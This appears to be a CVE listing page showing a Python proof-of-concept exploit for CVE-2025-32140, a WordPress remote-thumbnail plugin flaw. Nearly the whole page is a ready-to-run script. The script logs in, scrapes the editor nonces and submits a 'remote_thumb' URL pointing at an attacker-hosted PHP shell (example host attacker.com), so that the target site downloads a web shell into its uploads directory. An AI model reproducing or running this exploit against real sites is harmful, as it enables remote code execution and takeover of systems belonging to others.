4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-32140
README.md
Rendering markdown...
POC / CVE-2025-32140.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import re
from bs4 import BeautifulSoup
from requests_toolbelt.multipart.encoder import MultipartEncoder


# Exploit By: Nxploited ( Khaled Alenazi )


def initialize_session():
    session = requests.Session()
    session.verify = False
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    })
    return session


def parse_arguments():
    parser = argparse.ArgumentParser(description="Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi")
    parser.add_argument("--url", "-u", required=True, help="Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)")
    parser.add_argument("--username", "-un", required=True, help="Username")
    parser.add_argument("--password", "-p", required=True, help="Password")
    parser.add_argument("--user_ID", "-uid", required=True, help="User ID (usually 1 for admin)")
    parser.add_argument("--post_ID", "-pid", required=True, help="Target post ID")
    parser.add_argument("--shell", required=True, help="URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)")
    return parser.parse_args()


def login(session, url, username, password):
    login_url = f"{url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    response = session.post(login_url, data=login_data)
    if not any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[!] Failed to log in.")
        exit()
    print("[+] Logged in successfully.")


def set_cookies(session, url):
    post_new_url = f"{url}/wp-admin/post-new.php"
    session.get(post_new_url)
    print("[+] Cookies set successfully.")


def fetch_nonces(session, url, post_ID):
    edit_url = f"{url}/wp-admin/post.php?post={post_ID}&action=edit"
    response = session.get(edit_url)
    soup = BeautifulSoup(response.text, 'html.parser')

    def extract_nonce(name):
        tag = soup.find('input', {'name': name})
        value = tag['value'] if tag else None
        print(f"[DEBUG] Extracted {name}: {value}")
        return value

    nonces = {
        '_wpnonce': extract_nonce('_wpnonce'),
        'meta-box-order-nonce': extract_nonce('meta-box-order-nonce'),
        'closedpostboxesnonce': extract_nonce('closedpostboxesnonce'),
        'samplepermalinknonce': extract_nonce('samplepermalinknonce'),
        'wprthumb_nonce': extract_nonce('wprthumb_nonce')
    }

    x_wp_nonce_match = re.search(r"window\._wpNonce\s*=\s*\"([a-f0-9]+)\"", response.text)
    x_wp_nonce = x_wp_nonce_match.group(1) if x_wp_nonce_match else None
    print(f"[DEBUG] Extracted X-WP-Nonce: {x_wp_nonce}")

    return nonces, x_wp_nonce, edit_url


def send_exploit(session, url, nonces, x_wp_nonce, post_ID, user_ID, shell, edit_url):
    upload_url = f"{url}/wp-admin/post.php"
    m = MultipartEncoder(fields={
        '_wpnonce': nonces['_wpnonce'],
        '_wp_http_referer': f"{url}/wp-admin/post-new.php",
        'user_ID': user_ID,
        'action': 'editpost',
        'originalaction': 'editpost',
        'post_type': 'post',
        'original_post_status': 'auto-draft',
        'referredby': f"{url}/wp-admin/edit.php",
        '_wp_original_http_referer': f"{url}/wp-admin/edit.php",
        'auto_draft': '1',
        'post_ID': post_ID,
        'meta-box-order-nonce': nonces['meta-box-order-nonce'],
        'closedpostboxesnonce': nonces['closedpostboxesnonce'],
        'samplepermalinknonce': nonces['samplepermalinknonce'],
        'wprthumb_nonce': nonces['wprthumb_nonce'],
        'remote_thumb': shell,
        'comment_status': 'open',
        'ping_status': 'open',
        'post_author': user_ID
    })

    headers = session.headers.copy()
    headers['Content-Type'] = m.content_type
    headers['Referer'] = edit_url
    if x_wp_nonce:
        headers['X-WP-Nonce'] = x_wp_nonce

    response = session.post(upload_url, data=m, headers=headers)

    if response.status_code == 200:
        print("[+] Exploit POST sent successfully. Check your uploads directory.")
        print("By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited")
    else:
        print(f"[!] Exploit failed. Status: {response.status_code}")
        print("[DEBUG] Response body:", response.text)


def main():
    args = parse_arguments()
    session = initialize_session()

    login(session, args.url, args.username, args.password)
    set_cookies(session, args.url)

    nonces, x_wp_nonce, edit_url = fetch_nonces(session, args.url, args.post_ID)
    send_exploit(session, args.url, nonces, x_wp_nonce, args.post_ID, args.user_ID, args.shell, edit_url)


if __name__ == "__main__":
    main()